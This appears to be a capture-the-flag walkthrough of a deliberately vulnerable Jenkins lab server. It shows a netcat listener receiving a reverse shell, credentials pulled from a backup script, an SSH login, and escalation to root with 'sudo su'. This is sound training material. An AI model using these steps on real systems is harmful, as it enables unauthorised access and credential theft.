We are dealing with a server that is vulnerable by design. It contains misconfigurations and has been implemented with poor or simply nonexistent security practices.
──(kali㉿kali)-[~]
└─$ nc -lnvp 6996
listening on [any] 6996 ...
connect to [10.17.15.155] from (UNKNOWN) [10.10.63.220] 52726
whoami
jenkins
Successfull Reverse Shell
┌──(kali㉿kali)-[~]
└─$ ssh tracy@10.10.63.220
tracy@10.10.63.220's password:
Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-88-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Wed Dec 13 05:20:26 AM UTC 2023
System load: 0.00537109375 Processes: 114
Usage of /: 48.0% of 9.75GB Users logged in: 1
Memory usage: 37% IPv4 address for eth0: 10.10.63.220
Swap usage: 0%
* Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
just raised the bar for easy, resilient and secure K8s cluster deployment.
https://ubuntu.com/engage/secure-kubernetes-at-the-edge
Expanded Security Maintenance for Applications is not enabled.
41 updates can be applied immediately.
To see these additional updates run: apt list --upgradable
Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Wed Nov 22 19:59:37 2023 from 10.18.65.106
tracy@jenkins:~$ sudo -l
[sudo] password for tracy:
Matching Defaults entries for tracy on jenkins:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User tracy may run the following commands on jenkins:
(ALL : ALL) ALL
tracy@jenkins:~$ sudo su
root@jenkins:/home/tracy#
The (ALL :ALL) ALL line in the output essentially says that all commands can be performed by tracy using sudo. This means that the user is created with inherently privileged access. As such, we can just enter the command sudo su, and we're root!
What is the default port for Jenkins?
[REDACTED]
What is the password of the user tracy?
[REDACTED]
Can be found in a backupfile.
──(kali㉿kali)-[~]
└─$ nc -lnvp 6996
listening on [any] 6996 ...
connect to [10.17.15.155] from (UNKNOWN) [10.10.63.220] 52726
whoami
jenkins
cd /opt/scripts
ls
backup.sh
cat backup.sh
#!/bin/sh
.
.
.
tar czvf /var/lib/jenkins/backup.tar.gz /var/lib/jenkins/backup/
/bin/sleep 5
username=[REDACTED]
password=[REDACTED]
What's the root flag?
[REDACTED]
Can be found when we get root access using tracy's password.
root@jenkins:/# cd root
root@jenkins:~# ls
[REDACTED] snap
root@jenkins:~# cat flag.txt
[REDACTED]
What is the error message when you login as tracy again and try sudo -l after its removal from the sudoers group?
Sorry, user tracy may not run sudo on jenkins.
What's the SSH flag?
[REDACTED]
Can be found in the SSH config file.
What's the Jenkins flag?
[REDACTED]
Can be found in the backup config file.
Jenkins Dashboard without authentication
Access to Scrip Console allowing RCE and hence Reverse Shell
